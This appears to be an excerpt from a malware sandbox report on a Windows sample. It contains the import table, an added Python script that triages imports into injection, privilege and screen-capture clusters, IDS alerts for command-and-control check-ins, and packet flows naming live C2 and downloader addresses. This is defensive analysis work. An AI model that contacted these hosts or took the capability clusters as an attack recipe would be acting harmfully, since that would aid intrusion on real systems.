| gdi32.dll | TextOutW, StretchDIBits, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixelV, SetPixel, SetDIBitsToDevice, SetDIBits, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RoundRect, RestoreDC, ResizePalette, Rectangle, RectVisible, RealizePalette, Polyline, OffsetViewportOrgEx, MoveToEx, LineTo, IntersectClipRect, GetViewportOrgEx, GetTextMetricsW, GetTextExtentPoint32W, GetTextExtentExPointW, GetTextColor, GetTextAlign, GetStockObject, GetROP2, GetPixel, GetPaletteEntries, GetObjectType, GetObjectW, GetNearestPaletteIndex, GetDeviceCaps, GetDIBits, GetCurrentPositionEx, GetCurrentObject, GetClipBox, GetBkMode, GetBkColor, ExtTextOutW, ExcludeClipRect, Ellipse, DeleteObject, DeleteDC, CreateRoundRectRgn, CreateRectRgn, CreatePolygonRgn, CreatePenIndirect, CreatePen, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CombineRgn, BitBlt |
| kernel32.dll | lstrcmpW, WriteProcessMemory, WritePrivateProfileStringW, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, UnmapViewOfFile, TerminateProcess, SystemTimeToFileTime, Sleep, ReadProcessMemory, QueryDosDeviceW, OutputDebugStringW, OpenProcess, MulDiv, MapViewOfFile, LocalFree, LocalAlloc, LoadLibraryW, LeaveCriticalSection, IsBadCodePtr, InitializeCriticalSection, HeapFree, HeapDestroy, HeapAlloc, GlobalUnlock, GlobalMemoryStatus, GlobalHandle, GlobalLock, GlobalGetAtomNameW, GlobalFree, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetTickCount, GetTempPathW, GetSystemTime, GetSystemInfo, GetSystemDirectoryW, GetProcessTimes, GetProcAddress, GetPrivateProfileStringW, GetPriorityClass, GetModuleHandleW, GetModuleFileNameW, GetLogicalDriveStringsW, GetLastError, GetDriveTypeW, GetDiskFreeSpaceExW, GetCurrentThreadId, GetCurrentProcess, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FlushInstructionCache, FileTimeToSystemTime, EnterCriticalSection, CreateMutexW, CreateFileMappingW, CreateFileW, CopyFileW, CloseHandle |
| advapi32.dll | RegQueryValueExW, RegOpenKeyExW, RegFlushKey, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW, GetUserNameW, AdjustTokenPrivileges |
| shell32.dll | SHGetFileInfoW, ExtractIconW |
| shell32.dll | SHGetSpecialFolderPathW, SHGetPathFromIDListW, SHBrowseForFolderW |
| ole32.dll | CoCreateInstance |
| comctl32.dll | _TrackMouseEvent, ImageList_GetIconSize, ImageList_Draw |
| Kernel32.dll | GetLongPathNameW |
| kernel32.dll | Sleep |
| ole32.dll | IsEqualGUID |
| comctl32.dll | ImageList_GetIconSize |
| user32.dll | PrivateExtractIconsW |
| kernel32.dll | VerSetConditionMask, VerifyVersionInfoW |
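The import table above is what a static triage pass sees before any sandbox run. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it groups the listed imports into the capability clusters a reviewer would look for (cross-process memory access, token privilege adjustment, runtime API resolution, host profiling, GDI screen capture) and reports which of the usual injection execution primitives are absent from the static table. The DLL and API lists are transcribed from the rows above; the cluster names, thresholds and verdict rule are this example's own assumptions, not a published taxonomy.

```python
"""Static import-table triage: which capability clusters does the listed import set cover?

Added example (not code from the report). DLL/import lists are transcribed from the import
table above; cluster names, thresholds and the verdict rule are assumptions of this example.
"""
from collections import defaultdict

# Subset of the report's import table, constructed here as a dict. The binary lists
# "kernel32.dll" and "Kernel32.dll" separately; the triage merges DLL names case-insensitively.
REPORT_IMPORTS = {
    "gdi32.dll": ["BitBlt", "StretchBlt", "GetDIBits", "CreateCompatibleBitmap",
                  "CreateCompatibleDC", "CreateDIBSection", "SelectObject", "DeleteDC"],
    "kernel32.dll": ["WriteProcessMemory", "ReadProcessMemory", "OpenProcess", "VirtualProtect",
                     "VirtualQuery", "LoadLibraryW", "GetProcAddress", "CreateMutexW",
                     "GetLogicalDriveStringsW", "GetDriveTypeW", "GetDiskFreeSpaceExW",
                     "GlobalMemoryStatus", "GetVersionExW", "GetTempPathW", "CopyFileW",
                     "OutputDebugStringW", "TerminateProcess"],
    "advapi32.dll": ["RegQueryValueExW", "RegOpenKeyExW", "OpenProcessToken",
                     "LookupPrivilegeValueW", "GetUserNameW", "AdjustTokenPrivileges"],
    "Kernel32.dll": ["GetLongPathNameW"],
    "user32.dll": ["PrivateExtractIconsW"],
}

# cluster -> (APIs that characterise it, minimum number that must be present to report it)
CLUSTERS = {
    "remote_process_memory":  ({"OpenProcess", "ReadProcessMemory", "WriteProcessMemory"}, 3),
    "remote_exec_primitives": ({"VirtualAllocEx", "CreateRemoteThread", "NtCreateThreadEx",
                                "QueueUserAPC", "SetThreadContext", "ResumeThread"}, 1),
    "token_privilege_adjust": ({"OpenProcessToken", "LookupPrivilegeValueW",
                                "AdjustTokenPrivileges"}, 3),
    "dynamic_api_resolution": ({"LoadLibraryW", "LoadLibraryA", "LoadLibraryExW",
                                "GetProcAddress"}, 2),
    "host_profiling":         ({"GetLogicalDriveStringsW", "GetDriveTypeW", "GetDiskFreeSpaceExW",
                                "GlobalMemoryStatus", "GetVersionExW", "GetUserNameW"}, 3),
    "gdi_screen_capture":     ({"BitBlt", "GetDIBits", "CreateCompatibleBitmap",
                                "CreateCompatibleDC"}, 4),
}


def merge_imports(imports):
    """Merge per-DLL import lists, folding DLL name case (Kernel32.dll == kernel32.dll)."""
    merged = defaultdict(set)
    for dll, names in imports.items():
        merged[dll.lower()].update(names)
    return dict(merged)


def all_import_names(imports):
    """Flat set of every imported API name, regardless of DLL."""
    return set().union(*merge_imports(imports).values())


def triage_imports(imports):
    """Return {cluster: sorted matched APIs} for every cluster that meets its threshold."""
    names = all_import_names(imports)
    hits = {}
    for cluster, (apis, threshold) in CLUSTERS.items():
        matched = sorted(apis & names)
        if len(matched) >= threshold:
            hits[cluster] = matched
    return hits


def missing_exec_primitives(imports):
    """Injection execution primitives absent from the static table. When
    dynamic_api_resolution also fires, these are the first names to look for in
    GetProcAddress call sites at runtime."""
    return sorted(CLUSTERS["remote_exec_primitives"][0] - all_import_names(imports))


def verdict(hits):
    """Coarse label: cross-process write capability plus a way to execute or resolve more."""
    if "remote_process_memory" in hits and (
        "remote_exec_primitives" in hits or "dynamic_api_resolution" in hits
    ):
        return "injection-capable (confirm the execution primitive dynamically)"
    if "remote_process_memory" in hits:
        return "cross-process memory access only"
    return "no injection cluster in static imports"


if __name__ == "__main__":
    found = triage_imports(REPORT_IMPORTS)
    for cluster, apis in found.items():
        print(f"{cluster:24} {', '.join(apis)}")
    print("not statically imported:", ", ".join(missing_exec_primitives(REPORT_IMPORTS)))
    print("verdict:", verdict(found))
```

Two caveats when reading the result. The GDI cluster fires for any Delphi GUI application, so on its own it is weak evidence; it only becomes interesting next to the `TScreenShotMainForm` resource listed above. More importantly, `VirtualAllocEx` and `CreateRemoteThread` are not in the static table at all, while `LoadLibraryW` and `GetProcAddress` are, so a static-only verdict understates what a sample of this shape can do; the execution primitive has to be confirmed from the sandbox run or from the `GetProcAddress` call sites, not from this table.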
| Language of compilation system | Country where language is spoken |
|---|---|
| English | Great Britain |
| English | Canada |
| Chinese | China |
| English | United States |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-10-05T16:46:40.239620+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 49803 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:46:42.481091+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 49815 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:46:45.158427+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49833 | 34.117.59.81 | 80 | TCP |
| 2024-10-05T16:46:45.163501+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 49832 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:46:47.803365+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 49849 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:46:50.585727+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 49861 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:46:53.572280+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50328 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:46:56.384698+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50342 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:46:58.687896+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50363 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:47:01.498487+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50380 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:47:04.168605+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50397 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:47:06.815409+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50414 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:47:09.479387+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50431 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:47:09.528082+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 50432 | 34.117.59.81 | 80 | TCP |
| 2024-10-05T16:47:13.121801+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50444 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:47:15.770445+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50449 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:47:15.809463+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 50450 | 34.117.59.81 | 80 | TCP |
| 2024-10-05T16:47:18.441887+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50451 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:47:21.431202+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50453 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:47:21.481284+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 50454 | 34.117.59.81 | 80 | TCP |
| 2024-10-05T16:47:24.141651+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50455 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:47:26.780755+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50457 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:47:30.387265+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50459 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:47:33.183372+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50461 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:47:35.647615+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50463 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:47:38.300123+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50465 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:47:40.935510+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50467 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:47:43.576008+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50469 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:47:46.208206+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50471 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:47:48.926986+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 50474 | 34.117.59.81 | 80 | TCP |
| 2024-10-05T16:47:48.934070+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50473 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:47:51.581575+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50475 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:47:54.225238+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50477 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:47:57.019805+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50479 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:48:00.299639+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 50482 | 34.117.59.81 | 80 | TCP |
| 2024-10-05T16:48:00.304354+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50481 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:48:02.197951+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50483 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:48:02.247009+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 50484 | 34.117.59.81 | 80 | TCP |
| 2024-10-05T16:48:04.820098+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 50486 | 34.117.59.81 | 80 | TCP |
| 2024-10-05T16:48:04.824904+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50485 | 193.142.146.64 | 8880 | TCP |
| 2024-10-05T16:48:07.476703+0200 | 2037836 | ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin | 1 | 192.168.2.7 | 50487 | 193.142.146.64 | 8880 | TCP |
                                  2024-10-05T16:48:10.104002+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750489193.142.146.648880TCP
                                  2024-10-05T16:48:12.680846+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750491193.142.146.648880TCP
                                  2024-10-05T16:48:15.229115+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750493193.142.146.648880TCP
                                  2024-10-05T16:48:15.325187+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.75049434.117.59.8180TCP
                                  2024-10-05T16:48:17.736987+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750495193.142.146.648880TCP
                                  2024-10-05T16:48:19.767983+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.75049834.117.59.8180TCP
                                  2024-10-05T16:48:22.877229+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750499193.142.146.648880TCP
                                  2024-10-05T16:48:22.918949+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.75050034.117.59.8180TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                  Oct 5, 2024 16:47:17.939856052 CEST888050451193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:17.939929008 CEST504518880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:17.940618992 CEST5045080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:17.941545010 CEST5045280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:17.945976973 CEST805045034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:17.946038008 CEST5045080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:17.946454048 CEST805045234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:17.946512938 CEST5045280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:17.946633101 CEST5045280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:17.951409101 CEST805045234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:18.431031942 CEST805045234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:18.431307077 CEST504518880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:18.441807985 CEST888050451193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:18.441886902 CEST504518880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:18.448179960 CEST888050451193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:18.481657028 CEST5045280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:19.561547041 CEST888050451193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:19.561669111 CEST504518880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:19.561849117 CEST504518880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:19.566731930 CEST888050451193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:20.575306892 CEST504538880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:20.917254925 CEST888050453193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:20.917397022 CEST504538880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:20.918051004 CEST5045280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:20.923326969 CEST805045234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:20.923424006 CEST5045280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:20.926151991 CEST5045480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:20.931305885 CEST805045434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:20.931490898 CEST5045480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:20.931583881 CEST5045480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:20.940208912 CEST805045434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:21.425858974 CEST805045434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:21.426156044 CEST504538880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:21.431132078 CEST888050453193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:21.431201935 CEST504538880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:21.436144114 CEST888050453193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:21.481283903 CEST5045480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:22.544359922 CEST888050453193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:22.544450045 CEST504538880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:22.544620991 CEST504538880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:22.549619913 CEST888050453193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:23.560015917 CEST504558880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:23.565006971 CEST888050455193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:23.565103054 CEST504558880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:23.655673981 CEST5045680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:23.660820007 CEST805045634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:23.661009073 CEST5045680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:23.679546118 CEST5045680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:23.684648037 CEST805045634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:24.136053085 CEST805045634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:24.136648893 CEST504558880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:24.141493082 CEST888050455193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:24.141650915 CEST504558880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:24.146553993 CEST888050455193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:24.184417963 CEST5045680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:25.221501112 CEST888050455193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:25.221674919 CEST504558880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:25.226277113 CEST504558880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:25.231137037 CEST888050455193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:26.235372066 CEST504578880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:26.240521908 CEST888050457193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:26.240648985 CEST504578880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:26.297866106 CEST5045880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:26.297952890 CEST5045680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:26.303102970 CEST805045834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:26.303210974 CEST5045880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:26.303584099 CEST805045634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:26.303648949 CEST5045680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:26.319240093 CEST5045880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:26.324275970 CEST805045834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:26.773137093 CEST805045834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:26.775782108 CEST504578880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:26.780678988 CEST888050457193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:26.780755043 CEST504578880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:26.785572052 CEST888050457193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:26.825022936 CEST5045880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:27.873677015 CEST888050457193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:27.873759985 CEST504578880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:27.873981953 CEST504578880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:27.878806114 CEST888050457193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:28.888278008 CEST504598880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:29.853388071 CEST888050459193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:29.853605986 CEST504598880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:29.875601053 CEST5046080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:29.875708103 CEST5045880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:29.880536079 CEST805046034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:29.880625010 CEST5046080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:29.880857944 CEST805045834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:29.880918026 CEST5045880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:29.884742975 CEST5046080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:29.889556885 CEST805046034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:30.381728888 CEST805046034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:30.382047892 CEST504598880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:30.387187958 CEST888050459193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:30.387264967 CEST504598880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:30.392168045 CEST888050459193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:30.434463978 CEST5046080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:31.465913057 CEST888050459193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:31.466085911 CEST504598880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:31.466264009 CEST504598880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:31.471052885 CEST888050459193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:32.488104105 CEST504618880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:32.498585939 CEST888050461193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:32.498720884 CEST504618880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:32.512120008 CEST5046280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:32.512202024 CEST5046080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:32.517190933 CEST805046234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:32.517297983 CEST5046280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:32.517427921 CEST5046280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:32.517474890 CEST805046034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:32.517539978 CEST5046080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:32.522289038 CEST805046234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:33.169759035 CEST805046234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:33.178252935 CEST504618880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:33.183284044 CEST888050461193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:33.183372021 CEST504618880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:33.188252926 CEST888050461193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:33.203136921 CEST805046234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:33.203201056 CEST5046280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:34.124001980 CEST888050461193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:34.124154091 CEST504618880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:34.124289036 CEST504618880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:34.129082918 CEST888050461193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:35.137994051 CEST504638880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:35.144851923 CEST888050463193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:35.144980907 CEST504638880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:35.145867109 CEST5046280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:35.151243925 CEST805046234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:35.151338100 CEST5046280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:35.154558897 CEST5046480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:35.159755945 CEST805046434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:35.159993887 CEST5046480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:35.160059929 CEST5046480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:35.165108919 CEST805046434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:35.640785933 CEST805046434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:35.642425060 CEST504638880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:35.647541046 CEST888050463193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:35.647614956 CEST504638880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:35.652471066 CEST888050463193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:35.684545994 CEST5046480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:36.780487061 CEST888050463193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:36.780632019 CEST504638880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:36.780870914 CEST504638880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:36.785952091 CEST888050463193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:37.794135094 CEST504658880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:37.799165964 CEST888050465193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:37.799247980 CEST504658880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:37.800065994 CEST5046480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:37.801074028 CEST5046680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:37.805138111 CEST805046434.117.59.81192.168.2.7
